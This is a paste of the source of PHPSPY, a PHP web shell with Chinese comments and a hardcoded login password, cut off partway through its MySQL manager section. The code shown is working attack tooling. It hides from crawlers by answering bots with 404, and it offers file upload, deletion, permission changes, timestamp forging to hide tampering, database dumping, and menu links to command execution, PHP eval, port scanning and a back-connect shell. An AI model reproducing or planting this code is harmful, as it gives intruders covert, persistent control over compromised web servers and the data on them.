· 6 years ago · Oct 18, 2019, 03:38 AM
1PHPSPY
2<?php
3$pass = 'S3cru1tyTE5t*&^#$%';
4
5
6@error_reporting(7);
7@session_start();
8@set_time_limit(0);
9@set_magic_quotes_runtime(0);
10if( strpos( strtolower( $_SERVER['HTTP_USER_AGENT'] ), 'bot' ) !== false ) {
11 header('HTTP/1.0 404 Not Found');
12 exit;
13}
14ob_start();
15$mtime = explode(' ', microtime());
16$starttime = $mtime[1] + $mtime[0];
17define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
18define('SELF', $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']);
19define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
20define('IS_GPC', get_magic_quotes_gpc());
21$dis_func = get_cfg_var('disable_functions');
22define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
23
24if( IS_GPC ) {
25 $_POST = s_array($_POST);
26}
27$P = $_POST;
28unset($_POST);
29/*===================== 程序配置 =====================*/
30
31
32//如您对 cookie 作用范围有特殊要求, 或登录不正常, 请修改下面变量, 否则请保持默认
33// cookie 前缀
34$cookiepre = '';
35// cookie 作用域
36$cookiedomain = '';
37// cookie 作用路径
38$cookiepath = '/';
39// cookie 有效期
40$cookielife = 86400;
41
42/*===================== 配置结束 =====================*/
43
44$charsetdb = array(
45 'big5' => 'big5',
46 'cp-866' => 'cp866',
47 'euc-jp' => 'ujis',
48 'euc-kr' => 'euckr',
49 'gbk' => 'gbk',
50 'iso-8859-1' => 'latin1',
51 'koi8-r' => 'koi8r',
52 'koi8-u' => 'koi8u',
53 'utf-8' => 'utf8',
54 'windows-1252' => 'latin1',
55);
56
57$act = isset($P['act']) ? $P['act'] : '';
58$charset = isset($P['charset']) ? $P['charset'] : 'gbk';
59$doing = isset($P['doing']) ? $P['doing'] : '';
60
61for ($i=1;$i<=4;$i++) {
62 ${'p'.$i} = isset($P['p'.$i]) ? $P['p'.$i] : '';
63}
64
65if (isset($charsetdb[$charset])) {
66 header("content-Type: text/html; charset=".$charset);
67}
68
69$timestamp = time();
70
71/* 身份验证 */
72if ($act == "logout") {
73 scookie('loginpass', '', -86400 * 365);
74 @header('Location: '.SELF);
75 exit;
76}
77if($pass) {
78 if ($act == 'login') {
79 if ($pass == $P['password']) {
80 scookie('loginpass',$P['password']);
81 encode_pass($pass);
82 @header('Location: '.SELF);
83 exit;
84 }
85 }
86 if (isset($_COOKIE['loginpass'])) {
87 if ($_COOKIE['loginpass'] != $pass) {
88 loginpage();
89 }
90 } else {
91 loginpage();
92 }
93}
94/* 验证结束 */
95
96$errmsg = '';
97$uchar = '▲';
98$dchar = '▼';
99!$act && $act = 'file';
100
101//当前目录/设置工作目录/网站根目录
102$home_cwd = getcwd();
103if (isset($P['cwd']) && $P['cwd']) {
104 chdir($P['cwd']);
105} else {
106 chdir(SA_ROOT);
107}
108$cwd = getcwd();
109$web_cwd = $_SERVER['DOCUMENT_ROOT'];
110foreach (array('web_cwd','cwd','home_cwd') as $k) {
111 if (IS_WIN) {
112 $$k = str_replace('\\', '/', $$k);
113 }
114 if (substr($$k, -1) != '/') {
115 $$k = $$k.'/';
116 }
117}
118
119// 查看PHPINFO
120if ($act == 'phpinfo') {
121 if (IS_PHPINFO) {
122 phpinfo();
123 exit;
124 } else {
125 $errmsg = 'phpinfo() function has disabled';
126 }
127}
128
129if(!function_exists('scandir')) {
130 function scandir($cwd) {
131 $files = array();
132 $dh = opendir($cwd);
133 while ($file = readdir($dh)) {
134 $files[] = $file;
135 }
136 return $files ? $files : 0;
137 }
138}
139
140if ($act == 'down') {
141 if (is_file($p1) && is_readable($p1)) {
142 @ob_end_clean();
143 $fileinfo = pathinfo($p1);
144 if (function_exists('mime_content_type')) {
145 $type = @mime_content_type($p1);
146 header("Content-Type: ".$type);
147 } else {
148 header('Content-type: application/x-'.$fileinfo['extension']);
149 }
150 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
151 header('Content-Length: '.sprintf("%u", @filesize($p1)));
152 @readfile($p1);
153 exit;
154 } else {
155 $errmsg = 'Can\'t read file';
156 $act = 'file';
157 }
158}
159?>
160<html>
161<head>
162<meta http-equiv="Content-Type" content="text/html; charset=<?php echo $charset;?>">
163<title><?php echo $act.' - '.$_SERVER['HTTP_HOST'];?></title>
164<style type="text/css">
165body,td{font: 12px Arial,Tahoma;line-height: 16px;}
166.input, select{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
167.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
168.red{color:#f00;}
169.black{color:#000;}
170.green{color:#090;}
171.b{font-weight:bold;}
172.bt {border-color:#b0b0b0;background:#3d3d3d;color:#fff;font:12px Arial,Tahoma;height:22px;}
173a {color: #00f;text-decoration:none;}
174a:hover{color: #f00;text-decoration:underline;}
175.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}
176.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}
177.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffa;padding:5px 15px 5px 5px;}
178.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}
179.head td span{font-weight:normal;}
180.infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;}
181form{margin:0;padding:0;}
182h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
183ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
184u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
185.drives{padding:5px;}
186.drives span {margin:auto 7px;}
187</style>
188<script type="text/javascript">
189function checkall(form) {
190 for(var i=0;i<form.elements.length;i++) {
191 var e = form.elements[i];
192 if (e.type == 'checkbox') {
193 if (e.name != 'chkall' && e.name != 'saveasfile')
194 e.checked = form.chkall.checked;
195 }
196 }
197}
198function $(id) {
199 return document.getElementById(id);
200}
201function createdir(){
202 var newdirname;
203 newdirname = prompt('Please input the directory name:', '');
204 if (!newdirname) return;
205 g(null,null,'createdir',newdirname);
206}
207function fileperm(pfile, val){
208 var newperm;
209 newperm = prompt('Current dir/file:'+pfile+'\nPlease input new permissions:', val);
210 if (!newperm) return;
211 g(null,null,'fileperm',pfile,newperm);
212}
213function rename(oldname){
214 var newfilename;
215 newfilename = prompt('Filename:'+oldname+'\nPlease input new filename:', '');
216 if (!newfilename) return;
217 g(null,null,'rename',newfilename,oldname);
218}
219function createfile(){
220 var filename;
221 filename = prompt('Please input the file name:', '');
222 if (!filename) return;
223 g('editfile', null, null, filename);
224}
225function setdb(dbname) {
226 if(!dbname) return;
227 $('dbform').tablename.value='';
228 $('dbform').doing.value='';
229 if ($('dbform').sql_query)
230 {
231 $('dbform').sql_query.value='';
232 }
233 $('dbform').submit();
234}
235function setsort(k) {
236 $('dbform').order.value=k;
237 $('dbform').submit();
238}
239function settable(tablename,doing) {
240 if(!tablename) return;
241 if (doing) {
242 $('dbform').doing.value=doing;
243 } else {
244 $('dbform').doing.value='';
245 }
246 $('dbform').sql_query.value='';
247 $('dbform').tablename.value=tablename;
248 $('dbform').submit();
249}
250function s(act,cwd,p1,p2,p3,p4,charset) {
251 if(act != null) $('opform').act.value=act;
252 if(cwd != null) $('opform').cwd.value=cwd;
253 if(p1 != null) $('opform').p1.value=p1;
254 if(p2 != null) $('opform').p2.value=p2;
255 if(p3 != null) $('opform').p3.value=p3;
256 if(p4 != null) {$('opform').p4.value=p4;}else{$('opform').p4.value='';}
257 if(charset != null) $('opform').charset.value=charset;
258}
259function g(act,cwd,p1,p2,p3,p4,charset) {
260 s(act,cwd,p1,p2,p3,p4,charset);
261 $('opform').submit();
262}
263</script>
264</head>
265<body style="margin:0;table-layout:fixed; word-break:break-all">
266<?php
267
268formhead(array('name'=>'opform'));
269makehide('act', $act);
270makehide('cwd', $cwd);
271makehide('p1', $p1);
272makehide('p2', $p2);
273makehide('p3', $p3);
274makehide('p4', $p4);
275makehide('charset', $charset);
276formfoot();
277
278if(!function_exists('posix_getegid')) {
279 $user = @get_current_user();
280 $uid = @getmyuid();
281 $gid = @getmygid();
282 $group = "?";
283} else {
284 $uid = @posix_getpwuid(@posix_geteuid());
285 $gid = @posix_getgrgid(@posix_getegid());
286 $uid = $uid['uid'];
287 $user = $uid['name'];
288 $gid = $gid['gid'];
289 $group = $gid['name'];
290}
291?>
292<table width="100%" border="0" cellpadding="0" cellspacing="0">
293 <tr class="head">
294 <td><span style="float:right;"><?php echo @php_uname();?> / User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
295 </tr>
296 <tr class="alt1">
297 <td>
298 <span style="float:right;">Charset:
299 <?php
300 makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'onchange'=>'g(null,null,null,null,null,null,this.value);'));
301 ?>
302 </span>
303 <a href="javascript:g('logout');">Logout</a> |
304 <a href="javascript:g('file',null,'','','','','<?php echo $charset;?>');">File Manager</a> |
305 <a href="javascript:g('mysqladmin',null,'','','','','<?php echo $charset;?>');">MYSQL Manager</a> |
306 <a href="javascript:g('shell',null,'','','','','<?php echo $charset;?>');">Execute Command</a> |
307 <a href="javascript:g('phpenv',null,'','','','','<?php echo $charset;?>');">PHP Variable</a> |
308 <a href="javascript:g('portscan',null,'','','','','<?php echo $charset;?>');">Port Scan</a> |
309 <a href="javascript:g('secinfo',null,'','','','','<?php echo $charset;?>');">Security information</a> |
310 <a href="javascript:g('eval',null,'','','','','<?php echo $charset;?>');">Eval PHP Code</a>
311 <?php if (!IS_WIN) {?> | <a href="javascript:g('backconnect',null,'','','','','<?php echo $charset;?>');">Back Connect</a><?php }?>
312 </td>
313 </tr>
314</table>
315<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
316<?php
317$errmsg && m($errmsg);
318
319if ($act == 'file') {
320
321 // 判断当前目录可写情况
322 $dir_writeable = @is_writable($cwd) ? 'Writable' : 'Non-writable';
323 if (isset($p1)) {
324 switch($p1) {
325 case 'createdir':
326 // 创建目录
327 if ($p2) {
328 m('Directory created '.(@mkdir($cwd.$p2,0777) ? 'success' : 'failed'));
329 }
330 break;
331 case 'uploadFile':
332 // 上传文件
333 m('File upload '.(@move_uploaded_file($_FILES['uploadfile']['tmp_name'], $cwd.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
334 break;
335 case 'fileperm':
336 // 编辑文件属性
337 if ($p2 && $p3) {
338 $p3 = base_convert($p3, 8, 10);
339 m('Set file permissions '.(@chmod($p2, $p3) ? 'success' : 'failed'));
340 }
341 break;
342 case 'rename':
343 // 改名
344 if ($p2 && $p3) {
345 m($p3.' renamed '.$p2.(@rename($p3, $p2) ? ' success' : ' failed'));
346 }
347 break;
348 case 'clonetime':
349 // 克隆时间
350 if ($p2 && $p3) {
351 $time = @filemtime($p3);
352 m('Set file last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));
353 }
354 break;
355 case 'settime':
356 // 自定义时间
357 if ($p2 && $p3) {
358 $time = strtotime($p3);
359 m('Set file last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));
360 }
361 break;
362 case 'delete':
363 // 批量删除文件
364 if ($P['dl']) {
365 $succ = $fail = 0;
366 foreach ($P['dl'] as $f) {
367 if (is_dir($cwd.$f)) {
368 if (@deltree($cwd.$f)) {
369 $succ++;
370 } else {
371 $fail++;
372 }
373 } else {
374 if (@unlink($cwd.$f)) {
375 $succ++;
376 } else {
377 $fail++;
378 }
379 }
380 }
381 m('Deleted folder/file(s) have finished, choose '.count($P['dl']).', success '.$succ.', fail '.$fail);
382 } else {
383 m('Please select folder/file(s)');
384 }
385 break;
386 case 'paste':
387 if($_SESSION['do'] == 'copy') {
388 foreach($_SESSION['dl'] as $f) {
389 copy_paste($_SESSION['c'],$f, $cwd);
390 }
391 } elseif($_SESSION['do'] == 'move') {
392 foreach($_SESSION['dl'] as $f) {
393 @rename($_SESSION['c'].$f, $cwd.$f);
394 }
395 }
396 unset($_SESSION['do'], $_SESSION['dl'], $_SESSION['c']);
397 break;
398 default:
399 if($p1 == 'copy' || $p1 == 'move') {
400 if (isset($P['dl']) && count($P['dl'])) {
401 $_SESSION['do'] = $p1;
402 $_SESSION['dl'] = $P['dl'];
403 $_SESSION['c'] = $P['cwd'];
404 m('Have been copied to the session');
405 } else {
406 m('Please select folder/file(s)');
407 }
408 }
409 break;
410 }
411 echo "<script type=\"text/javascript\">$('opform').p1.value='';$('opform').p2.value='';</script>";
412 }
413 //操作完毕
414 $free = @disk_free_space($cwd);
415 !$free && $free = 0;
416 $all = @disk_total_space($cwd);
417 !$all && $all = 0;
418 $used = $all-$free;
419 p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');
420
421 $cwd_links = '';
422 $path = explode('/', $cwd);
423 $n=count($path);
424 for($i=0;$i<$n-1;$i++) {
425 $cwd_links .= '<a href="javascript:g(\'file\', \'';
426 for($j=0;$j<=$i;$j++) {
427 $cwd_links .= $path[$j].'/';
428 }
429 $cwd_links .= '\');">'.$path[$i].'/</a>';
430 }
431echo filebackup();
432?>
433<script type="text/javascript">
434document.onclick = shownav;
435function shownav(e){
436 var src = e?e.target:event.srcElement;
437 do{
438 if(src.id =="jumpto") {
439 $('inputnav').style.display = "";
440 $('pathnav').style.display = "none";
441 return;
442 }
443 if(src.id =="inputnav") {
444 return;
445 }
446 src = src.parentNode;
447 }while(src.parentNode)
448
449 $('inputnav').style.display = "none";
450 $('pathnav').style.display = "";
451}
452</script>
453<div style="background:#eee;margin-bottom:10px;">
454 <form onsubmit="g('file',this.cwd.value);return false;" method="POST" id="godir" name="godir">
455 <table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0">
456 <tr>
457 <td width="100%"><?php echo $cwd_links.' - '.getChmod($cwd).' / '.PermsColor($cwd).getUser($cwd);?> (<?php echo $dir_writeable;?>)</td>
458 <td nowrap><input class="bt" id="jumpto" name="jumpto" value="Jump to" type="button"></td>
459 </tr>
460 </table>
461 <table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;">
462 <tr>
463 <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($cwd);?>)</td>
464 <td width="100%"><input class="input" name="cwd" value="<?php echo $cwd;?>" type="text" style="width:99%;margin:0 8px;"></td>
465 <td nowrap><input class="bt" value="GO" type="submit"></td>
466 </tr>
467 </table>
468 </form>
469<?php
470 if (IS_WIN) {
471 $comma = '';
472 p('<div class="drives">');
473 foreach( range('A','Z') as $drive ) {
474 if (is_dir($drive.':/')) {
475 p($comma.'<a href="javascript:g(\'file\', \''.$drive.':/\');">'.$drive.':\</a>');
476 $comma = '<span>|</span>';
477 }
478 }
479 p('</div>');
480 }
481?>
482</div>
483<?php
484 p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
485 p('<tr class="alt1"><td colspan="6" style="padding:5px;line-height:20px;">');
486 p('<form action="'.SELF.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input name="uploadfile" value="" type="file" /> <input class="bt" value="Upload" type="submit" /><input name="charset" value="'.$charset.'" type="hidden" /><input type="hidden" name="p1" value="uploadFile"><input name="cwd" value="'.$cwd.'" type="hidden" /></div></form>');
487 p('<a href="javascript:g(\'file\', \''.str_replace('\\','/',$web_cwd).'\');">WebRoot</a>');
488 p(' | <a href="javascript:g(\'file\', \''.$home_cwd.'\');">ScriptPath</a>');
489 p(' | <a href="javascript:g(\'file\',\''.$cwd.'\',null,null,null,\'dir\');">View Writable Directory</a> ');
490 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile();">Create File</a>');
491 p('</td></tr>');
492
493 $sort = array('filename', 1);
494 if($p1) {
495 if(preg_match('!s_([A-z_]+)_(\d{1})!', $p1, $match)) {
496 $sort = array($match[1], (int)$match[2]);
497 }
498 }
499
500 formhead(array('name'=>'flist'));
501 makehide('act','file');
502 makehide('p1','');
503 makehide('cwd',$cwd);
504 makehide('charset',$charset);
505 p('<tr class="head">');
506 p('<td width="2%" nowrap><input name="chkall" value="on" type="checkbox" onclick="checkall(this.form)" /></td>');
507 p('<td><a href="javascript:g(\'file\',null,\'s_filename_'.($sort[1]?0:1).'\');">Filename</a> '.($p1 == 's_filename_0' ? $dchar : '').($p1 == 's_filename_1' || !$p1 ? $uchar : '').'</td>');
508 p('<td width="16%"><a href="javascript:g(\'file\',null,\'s_mtime_'.($sort[1]?0:1).'\');">Last modified</a> '.($p1 == 's_mtime_0' ? $dchar : '').($p1 == 's_mtime_1' ? $uchar : '').'</td>');
509 p('<td width="10%"><a href="javascript:g(\'file\',null,\'s_size_'.($sort[1]?0:1).'\');">Size</a> '.($p1 == 's_size_0' ? $dchar : '').($p1 == 's_size_1' ? $uchar : '').'</td>');
510 p('<td width="20%">Chmod / Perms</td>');
511 p('<td width="22%">Action</td>');
512 p('</tr>');
513
514 //查看所有可写文件和目录
515 $dirdata=$filedata=array();
516
517 if ($p4 == 'dir') {
518 $dirdata = GetWDirList($cwd);
519 $filedata = array();
520 } else {
521 // 默认目录列表
522 $dirs = @scandir($cwd);
523 if ($dirs) {
524 $dirs = array_diff($dirs, array('.'));
525 foreach ($dirs as $file) {
526 $filepath=$cwd.$file;
527 if(@is_dir($filepath)){
528 $dirdb['filename']=$file;
529 $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
530 $dirdb['chmod']=getChmod($filepath);
531 $dirdb['perm']=PermsColor($filepath);
532 $dirdb['owner']=getUser($filepath);
533 $dirdb['link']=$filepath;
534 if ($file=='..') {
535 $dirdata['up']=1;
536 } else {
537 $dirdata[]=$dirdb;
538 }
539 } else {
540 $filedb['filename']=$file;
541 //$filedb['size']=@filesize($filepath);
542 $filedb['size']=sprintf("%u", @filesize($filepath));
543 $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
544 $filedb['chmod']=getChmod($filepath);
545 $filedb['perm']=PermsColor($filepath);
546 $filedb['owner']=getUser($filepath);
547 $filedb['link']=$filepath;
548 $filedata[]=$filedb;
549 }
550 }
551 unset($dirdb);
552 unset($filedb);
553 }
554 }
555 $dir_i = '0';
556 if (isset($dirdata['up'])) {
557 $thisbg = bg();
558 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
559 p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:g(\'file\',\''.getUpPath($cwd).'\');">Parent Directory</a></td>');
560 p('</tr>');
561 }
562 unset($dirdata['up']);
563 usort($dirdata, 'cmp');
564 usort($filedata, 'cmp');
565 foreach($dirdata as $key => $dirdb){
566 if($p1 == 'getsize' && $p2 == $dirdb['filename']) {
567 $attachsize = dirsize($p2);
568 $attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
569 } else {
570 $attachsize = '<a href="javascript:g(\'file\', null, \'getsize\', \''.$dirdb['filename'].'\');">Stat</a>';
571 }
572 $thisbg = bg();
573 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
574 p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$dirdb['filename'].'"></td>');
575 p('<td><a href="javascript:g(\'file\',\''.$dirdb['link'].'\')">'.$dirdb['filename'].'</a></td>');
576 p('<td nowrap><a href="javascript:g(\'newtime\',null,\''.$dirdb['filename'].'\');">'.$dirdb['mtime'].'</a></td>');
577 p('<td nowrap>'.$attachsize.'</td>');
578 p('<td nowrap>');
579 p('<a href="javascript:fileperm(\''.$dirdb['filename'].'\', \''.$dirdb['chmod'].'\');">'.$dirdb['chmod'].'</a> / ');
580 p('<a href="javascript:fileperm(\''.$dirdb['filename'].'\', \''.$dirdb['chmod'].'\');">'.$dirdb['perm'].'</a>'.$dirdb['owner'].'</td>');
581 p('<td nowrap><a href="javascript:rename(\''.$dirdb['filename'].'\');">Rename</a></td>');
582 p('</tr>');
583 $dir_i++;
584 }
585
586 p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
587 $file_i = '0';
588
589 foreach($filedata as $key => $filedb){
590 $fileurl = '/'.str_replace($web_cwd,'',$filedb['link']);
591 $thisbg = bg();
592 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
593 p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$filedb['filename'].'"></td>');
594 p('<td>'.((strpos($filedb['link'], $web_cwd) !== false) ? '<a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a>' : $filedb['filename']).'</td>');
595 p('<td nowrap><a href="javascript:g(\'newtime\',null,\''.$filedb['filename'].'\');">'.$filedb['mtime'].'</a></td>');
596 p('<td nowrap>'.sizecount($filedb['size']).'</td>');
597 p('<td nowrap>');
598 p('<a href="javascript:fileperm(\''.$filedb['filename'].'\', \''.$filedb['chmod'].'\');">'.$filedb['chmod'].'</a> / ');
599 p('<a href="javascript:fileperm(\''.$filedb['filename'].'\', \''.$filedb['chmod'].'\');">'.$filedb['perm'].'</a>'.$filedb['owner'].'</td>');
600 p('<td nowrap>');
601 p('<a href="javascript:g(\'down\',null,\''.$filedb['filename'].'\');">Down</a> | ');
602 p('<a href="javascript:g(\'editfile\',null,null,\''.$filedb['filename'].'\');">Edit</a> | ');
603 p('<a href="javascript:rename(\''.$filedb['filename'].'\');">Rename</a>');
604 p('</td></tr>');
605 $file_i++;
606 }
607 p('<tr class="'.bg().' head"><td colspan="5"><a href="#" onclick="$(\'flist\').p1.value=\'delete\';$(\'flist\').submit();">Delete</a> | <a href="#" onclick="$(\'flist\').p1.value=\'copy\';$(\'flist\').submit();">Copy</a> | <a href="#" onclick="$(\'flist\').p1.value=\'move\';$(\'flist\').submit();">Move</a>'.(isset($_SESSION['do']) && @count($_SESSION['dl']) ? ' | <a href="#" onclick="$(\'flist\').p1.value=\'paste\';$(\'flist\').submit();">Paste</a>' : '').'</td><td align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
608 p('</form></table>');
609}// end dir
610
611elseif ($act == 'mysqladmin') {
612 $order = isset($P['order']) ? $P['order'] : '';
613 $dbhost = isset($P['dbhost']) ? $P['dbhost'] : '';
614 $dbuser = isset($P['dbuser']) ? $P['dbuser'] : '';
615 $dbpass = isset($P['dbpass']) ? $P['dbpass'] : '';
616 $dbname = isset($P['dbname']) ? $P['dbname'] : '';
617 $tablename = isset($P['tablename']) ? $P['tablename'] : '';
618
619 if ($doing == 'dump') {
620 if (isset($P['bak_table']) && $P['bak_table']) {
621 $DB = new DB_MySQL;
622 $DB->charsetdb = $charsetdb;
623 $DB->charset = $charset;
624 $DB->connect($dbhost, $dbuser, $dbpass, $dbname);
625 if ($P['saveasfile'] && $P['bak_path']) {
626 $fp = @fopen($P['bak_path'],'w');
627 if ($fp) {
628 foreach($P['bak_table'] as $k => $v) {
629 if ($v) {
630 $DB->sqldump($v, $fp);
631 }
632 }
633 fclose($fp);
634 $fileurl = str_replace(SA_ROOT,'',$P['bak_path']);
635 m('Database has backup to <a href="'.$fileurl.'" target="_blank">'.$P['bak_path'].'</a>');
636 } else {
637 m('Backup failed');
638 }
639 } else {
640 @ob_end_clean();
641 $filename = basename($dbname.'.sql');
642 header('Content-type: application/unknown');
643 header('Content-Disposition: attachment; filename='.$filename);
644 foreach($P['bak_table'] as $k => $v) {
645 if ($v) {
646 $DB->sqldump($v);
647 }
648 }
649 exit;
650 }
651 $DB->close();
652 } else {
653 m('Please choose the table');
654 }
655 $doing = '';
656 }
657
658 formhead(array('title'=>'MYSQL Manager', 'name'=>'dbform'));
659 makehide('act','mysqladmin');
660 makehide('doing',$doing);
661 makehide('charset', $charset);
662 makehide('tablename', $tablename);
663 makehide('order', $order);
664 p('<p>');
665 p('DBHost:');
666 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
667 p('DBUser:');
668 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
669 p('DBPass:');
670 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
671 makeinput(array('value'=>'Connect','type'=>'submit','class'=>'bt'));
672 p('</p>');
673
674 if ($dbhost && $dbuser && isset($dbpass)) {
675
676 // 初始化数据库类
677 $DB = new DB_MySQL;
678 $DB->charsetdb = $charsetdb;
679 $DB->charset = $charset;
680 $DB->connect($dbhost, $dbuser, $dbpass, $dbname);
681
682 //获取数据库信息
683 p('<p class="red">MySQL '.$DB->version().' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
684 $highver = $DB->version() > '4.1' ? 1 : 0;
685
686 //获取数据库
687 $query = $DB->query("SHOW DATABASES");
688 $dbs = array();
689 $dbs[] = '-- Select a database --';
690 while($db = $DB->fetch($query)) {
691 $dbs[$db['Database']] = $db['Database'];
692 }
693 makeselect(array('name'=>'dbname','option'=>$dbs,'selected'=>$dbname,'onchange'=>'setdb(this.options[this.selectedIndex].value)'));
694
695 if ($dbname) {
696 p('<p>Current dababase: <a href="javascript:setdb(\''.$dbname.'\');">'.$dbname.'</a>');
697 if ($tablename) {
698 p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> ]');
699 }
700 p('</p>');
701
702 $sql_query = isset($P['sql_query']) ? $P['sql_query'] : '';
703
704 if ($tablename && !$sql_query) {
705 $sql_query = "SELECT * FROM $tablename LIMIT 0, 30";
706 }
707 if ($tablename && $doing == 'structure') {
708 $sql_query = "SHOW FULL COLUMNS FROM $tablename;\n";
709 $sql_query .= "SHOW INDEX FROM $tablename;";
710 }
711 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" onclick="$(\'doing\').value=\'\'" style="height:50px;" type="submit" value="Query" /></td></tr></table></p>');
712 if ($sql_query) {
713 $querys = @explode(';',$sql_query);
714 foreach($querys as $num=>$query) {
715 if ($query) {
716 p("<p class=\"red b\">Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</p>");
717 switch($DB->query_res($query))
718 {
719 case 0:
720 p('<h2>'.$DB->halt('Error').'</h2>');
721 break;
722 case 1:
723 $result = $DB->query($query);
724 $tatol = $DB->num_rows($result);
725 p('<table border="0" cellpadding="3" cellspacing="0">');
726 p('<tr class="head">');
727 $fieldnum = @mysql_num_fields($result);
728 for($i=0;$i<$fieldnum;$i++){
729 p('<td nowrap>'.@mysql_field_name($result, $i).'</td>');
730 }
731 p('</tr>');
732
733 if (!$tatol) {
734 p('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';"><td nowrap colspan="'.$fieldnum.'" class="red b">No records</td></tr>');
735 } else {
736 while($mn = $DB->fetch($result)){
737 $thisbg = bg();
738 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
739 //读取记录用
740 foreach($mn as $key=>$inside){
741 p('<td nowrap>'.(($inside == null) ? '<i>null</i>' : html_clean($inside)).'</td>');
742 }
743 p('</tr>');
744 unset($b1);
745 }
746 }
747 p('</table>');
748 break;
749 case 2:
750 p('<h2>Affected Rows : '.$DB->affected_rows().'</h2>');
751 break;
752 }
753 }
754 }
755 } else {
756 $query = $DB->query("SHOW TABLE STATUS");
757 $table_num = $table_rows = $data_size = 0;
758 $tabledb = array();
759 while($table = $DB->fetch($query)) {
760 $data_size = $data_size + $table['Data_length'];
761 $table_rows = $table_rows + $table['Rows'];
762 $table_num++;
763 $tabledb[] = $table;
764 }
765 $data_size = sizecount($data_size);
766 unset($table);
767 if (count($tabledb)) {
768 if ($highver) {
769 $db_engine = $DB->fetch($DB->query("SHOW VARIABLES LIKE 'storage_engine';"));
770 $db_collation = $DB->fetch($DB->query("SHOW VARIABLES LIKE 'collation_database';"));
771 }
772 $sort = array('Name', 1);
773 if($order) {
774 if(preg_match('!s_([A-z_]+)_(\d{1})!', $order, $match)) {
775 $sort = array($match[1], (int)$match[2]);
776 }
777 }
778 usort($tabledb, 'cmp');
779 p('<table border="0" cellpadding="0" cellspacing="0" id="lists">');
780 p('<tr class="head">');
781 p('<td width="2%"><input name="chkall" value="on" type="checkbox" onclick="checkall(this.form)" /></td>');
782 p('<td><a href="javascript:setsort(\'s_Name_'.($sort[1]?0:1).'\');">Name</a> '.($order == 's_Name_0' ? $dchar : '').($order == 's_Name_1' || !$order ? $uchar : '').'</td>');
783 p('<td><a href="javascript:setsort(\'s_Rows_'.($sort[1]?0:1).'\');">Rows</a>'.($order == 's_Rows_0' ? $dchar : '').($order == 's_Rows_1' ? $uchar : '').'</td>');
784 p('<td><a href="javascript:setsort(\'s_Data_length_'.($sort[1]?0:1).'\');">Data_length</a>'.($order == 's_Data_length_0' ? $dchar : '').($order == 's_Data_length_1' ? $uchar : '').'</td>');
